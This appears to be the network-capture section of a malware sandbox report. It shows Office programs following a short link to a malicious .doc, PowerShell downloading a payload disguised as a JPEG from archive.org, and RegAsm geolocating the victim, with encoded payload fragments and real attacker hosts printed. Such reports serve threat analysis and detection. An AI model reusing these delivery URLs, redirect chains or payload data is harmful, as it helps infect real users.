                                                                      Data Ascii: A3Pm9DX/I1PI9jP/IzPn8TH/MxPJ4z/+QuPJ7jp+MoPo5jX+QlPK5DQ+YjPs4jI+ghPO4DB9ofPw3j59wdPS3Dy94bP12jj9YYPv1zS98APRzDl8gFPJxjO8cwO/vzO7MzOroz464rOcqzd6gmOZlDl4Y0Neejg24vNhPTFz8gM7LT3yssMGHzZxMTMCAD/wUJAAAAtAUAcAAAA/o6Pb+zj/83Pi9jW/AjPp7Ty+0rPx6Tn+EpP
                                                                      Aug 28, 2024 06:54:13.525916100 CEST1236INData Raw: 6f 41 4e 35 54 44 37 30 45 4f 4e 68 53 44 6a 30 67 48 4e 73 52 7a 49 7a 4d 2b 4d 51 50 6a 72 7a 67 34 4d 6c 4e 44 48 7a 63 78 4d 52 4d 44 44 79 6f 74 4d 50 4b 44 61 79 51 54 4d 69 47 7a 6a 78 6b 56 4d 69 41 54 37 77 51 4f 4d 57 44 54 77 77 45 4a
                                                                      Data Ascii: oAN5TD70EONhSDj0gHNsRzIzM+MQPjrzg4MlNDHzcxMRMDDyotMPKDayQTMiGzjxkVMiAT7wQOMWDTwwEJM6BzbwsFMQBzSwoCAAAArAQA8A8T/9sePQ3Dm9AUPw0jJ9kRPP0DA8YOPfzD28ENPeyTi8QIPzxTa8sEPvwTH8swO8vjg6knOSlz55AcObYjU2MTNFXja1kAN9QDM0gyM7LTxyIoMhJTWyEkMtEDYxEDMBDjdw4GA
                                                                      Aug 28, 2024 06:54:13.525928974 CEST1236INData Raw: 79 44 70 38 55 48 50 58 78 6a 55 38 30 45 50 43 78 6a 4a 38 49 77 4f 50 76 6a 79 37 55 38 4f 36 75 54 69 37 55 32 4f 67 74 7a 57 37 41 31 4f 30 73 54 48 37 49 67 4f 39 72 44 2b 36 30 75 4f 52 72 54 77 36 41 71 4f 62 71 6a 6c 36 73 6f 4f 70 70 7a
                                                                      Data Ascii: yDp8UHPXxjU80EPCxjJ8IwOPvjy7U8O6uTi7U2OgtzW7A1O0sTH7IgO9rD+60uORrTw6AqObqjl6soOppzV6kjO0ozL6QiOIkz85kcOEnzv5QbOYmjj5MXOulTa54VOClTL5kQOEgz/4QPOYjDt4cIOCiTf4IHOWhDT44COpgDJ4kxN9fz83g9NTfjz3M8NneTn3I4N9dDe302NRdzR3wyNncjI3chNkbDw2srN2azq24oNqZjN
                                                                      Aug 28, 2024 06:54:13.526078939 CEST1236INData Raw: 4d 78 4e 46 66 44 71 33 59 6c 4e 77 58 44 32 31 73 42 4e 69 54 44 76 30 41 34 4d 6a 4b 54 73 79 41 59 4d 69 48 54 6e 78 6f 57 4d 59 41 7a 36 77 34 4c 4d 4d 41 41 41 41 41 44 41 45 41 42 41 41 41 77 50 58 39 7a 4a 39 6b 64 50 53 32 7a 4e 39 6b 69
                                                                      Data Ascii: MxNFfDq3YlNwXD21sBNiTDv0A4MjKTsyAYMiHTnxoWMYAz6w4LMMAAAAADAEABAAAwPX9zJ9kdPS2zN9kiOxrTJ4kPOphzQ4YyN0YjT1ceNUXTo1EnMXLjlyUnMRJjSyUUMVHTGwoEAAAAQAQAAA8jl/E5Py5jd+UlPx4jK+USP4yDz8wZOAljNycrMQAD4woLMdCAAAwCADAPAAAwPn/zy/I3PYlTG4YLOkhDY4wFOYhDV4AFO
                                                                      Aug 28, 2024 06:54:13.526089907 CEST1236INData Raw: 45 7a 41 77 34 50 4d 34 44 6a 38 77 77 4f 4d 6e 44 54 34 77 73 4e 4d 56 44 44 30 77 6f 4d 4d 45 44 6a 76 77 6b 4c 4d 7a 43 54 72 77 63 4b 4d 69 43 44 6e 77 59 4a 4d 51 43 7a 69 77 55 49 4d 2f 42 54 65 77 51 48 4d 75 42 44 61 77 49 47 4d 64 42 7a
                                                                      Data Ascii: EzAw4PM4Dj8wwOMnDT4wsNMVDD0woMMEDjvwkLMzCTrwcKMiCDnwYJMQCziwUIM/BTewQHMuBDawIGMdBzVwEFMLBjRwAEM6ADNw8CMpAzIw0BMYAjEwwAMGATAAAQAYAwAgBAAA8z+/U/Pv/j6/Q+Pe/D2/M9PN/jx/E8P8+jt/A7Pq+Tp/85PZ+zk/44PI+jg/w3P39Tc/s2Pl9DY/o1PU9jT/k0PD9TP/czPy8DL/YyPg8zG
                                                                      Aug 28, 2024 06:54:13.526102066 CEST1236INData Raw: 44 77 4f 79 73 6a 4a 37 67 67 4f 6a 72 44 7a 36 73 57 4f 38 6e 6a 36 35 55 64 4f 49 44 41 41 41 77 42 41 43 41 4c 41 41 41 41 4e 63 53 6a 6b 30 49 31 4d 4c 4e 44 50 7a 45 7a 4d 6d 4d 7a 47 7a 34 67 4d 36 4c 6a 36 41 41 41 41 67 41 67 41 51 43 67
                                                                      Data Ascii: DwOysjJ7ggOjrDz6sWO8nj65UdOIDAAAwBACALAAAANcSjk0I1MLNDPzEzMmMzGz4gM6Lj6AAAAgAgAQCgOeqjm6YpOSqjj6ooOGqjg64nO6pjd6InOupja6YmOipjU60jOroTI6cRO7nD750dOWnDz5IcO4mjr5QaOxlDW5IUOpkjI5YROPkDC44NOUjTz4YMO/iDu4QIO6hzc4sDO0gjF3o/NpDAAAAHACAIAAAQOikzG58QO
                                                                      Aug 28, 2024 06:54:13.526196957 CEST1236INHTTP/1.1 200 OK
                                                                      Date: Wed, 28 Aug 2024 04:54:12 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      Last-Modified: Tue, 27 Aug 2024 14:33:15 GMT
                                                                      ETag: "a1000-620ab1f342ee9"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 659456
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/plain
                                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.2249175178.237.33.50802780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 28, 2024 06:54:15.430372953 CEST71OUTGET /json.gp HTTP/1.1
                                                                      Host: geoplugin.net
                                                                      Cache-Control: no-cache
                                                                      Aug 28, 2024 06:54:16.039000988 CEST1170INHTTP/1.1 200 OK
                                                                      date: Wed, 28 Aug 2024 04:54:15 GMT
                                                                      server: Apache
                                                                      content-length: 962
                                                                      content-type: application/json; charset=utf-8
                                                                      cache-control: public, max-age=300
                                                                      access-control-allow-origin: *
                                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.224916188.99.66.384433368C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-08-28 04:53:50 UTC321OUTGET /FoNVg0 HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: zhort.de
                                                                      Connection: Keep-Alive
                                                                      2024-08-28 04:53:50 UTC590INHTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:53:50 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 0
                                                                      Location: http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc
                                                                      Vary: Accept
                                                                      X-Served-By: zhort.de
                                                                      2024-08-28 04:53:50 UTC200INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 33 31 2e 32 31 2f 78 61 6d 70 70 2f 6e 62 63 2f 75 6e 2f 73 77 65 65 74 74 61 73 74 65 64 62 61 6e 61 6e 61 62 75 74 74 65 72 73 6d 6f 6f 74 68 63 68 63 6f 6c 63 61 74 65 62 75 74 74 65 72 72 69 63 68 63 6f 6e 74 65 6e 74 74 6f 6b 65 65 70 73 6d 6f 6f 74 68 62 75 74 74 65 72 63 68 6f 63 6f 6c 61 74 65 62 75 6e 74 6f 67 65 74 6d 65 73 77 65 65 74 67 69 72 6c 5f 5f 5f 5f 5f 5f 5f 5f 79 75 6d 6d 79 62 75 74 74 65 72 63 68 6f 63 6f 6c 61 74 65 73 6d 6f 6f 74 68 68 65 72 65 74 2e 64 6f 63
                                                                      Data Ascii: Found. Redirecting to http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.224916388.99.66.384433672C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-08-28 04:53:52 UTC130OUTOPTIONS / HTTP/1.1
                                                                      User-Agent: Microsoft Office Protocol Discovery
                                                                      Host: zhort.de
                                                                      Content-Length: 0
                                                                      Connection: Keep-Alive
                                                                      2024-08-28 04:53:52 UTC450INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:53:52 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 8
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Allow: GET,HEAD
                                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                      X-Served-By: zhort.de
                                                                      2024-08-28 04:53:52 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                                      Data Ascii: GET,HEAD


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.224916488.99.66.384433672C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-08-28 04:53:54 UTC115OUTHEAD /FoNVg0 HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                      Host: zhort.de
                                                                      2024-08-28 04:53:54 UTC602INHTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:53:54 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Location: http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc
                                                                      Vary: Accept
                                                                      X-Served-By: zhort.de


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      3192.168.2.224916588.99.66.38443
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-08-28 04:53:58 UTC125OUTOPTIONS / HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                      translate: f
                                                                      Host: zhort.de
                                                                      2024-08-28 04:53:58 UTC450INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:53:58 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 8
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Allow: GET,HEAD
                                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                      X-Served-By: zhort.de
                                                                      2024-08-28 04:53:58 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                                      Data Ascii: GET,HEAD


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      4192.168.2.224916688.99.66.38443
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-08-28 04:54:00 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 7a 68 6f 72 74 2e 64 65 0d 0a 0d 0a
                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: zhort.de
                                                                      2024-08-28 04:54:00 UTC423INHTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:54:00 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 144
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Content-Security-Policy: default-src 'none'
                                                                      2024-08-28 04:54:00 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      5192.168.2.224916788.99.66.38443
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-08-28 04:54:01 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 7a 68 6f 72 74 2e 64 65 0d 0a 0d 0a
                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: zhort.de
                                                                      2024-08-28 04:54:01 UTC423INHTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:54:01 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 144
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Content-Security-Policy: default-src 'none'
                                                                      2024-08-28 04:54:01 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.224916888.99.66.384433672C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-08-28 04:54:02 UTC134OUTHEAD /FoNVg0 HTTP/1.1
                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                      Host: zhort.de
                                                                      Content-Length: 0
                                                                      Connection: Keep-Alive
                                                                      2024-08-28 04:54:02 UTC602INHTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 28 Aug 2024 04:54:02 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Location: http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc
                                                                      Vary: Accept
                                                                      X-Served-By: zhort.de


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.2249171207.241.232.1544432772C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-08-28 04:54:10 UTC111OUTGET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                                      Host: ia803104.us.archive.org
                                                                      Connection: Keep-Alive
                                                                      2024-08-28 04:54:10 UTC591INHTTP/1.1 200 OK
                                                                      Server: nginx/1.24.0 (Ubuntu)
                                                                      Date: Wed, 28 Aug 2024 04:54:10 GMT
                                                                      Content-Type: image/jpeg
                                                                      Content-Length: 1931225
                                                                      Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                                      Connection: close
                                                                      ETag: "66a41ab4-1d77d9"
                                                                      Strict-Transport-Security: max-age=15724800
                                                                      Expires: Wed, 28 Aug 2024 10:54:10 GMT
                                                                      Cache-Control: max-age=21600
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                      Access-Control-Allow-Credentials: true
                                                                      Accept-Ranges: bytes
                                                                      2024-08-28 04:54:10 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                      2024-08-28 04:54:10 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                                      Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
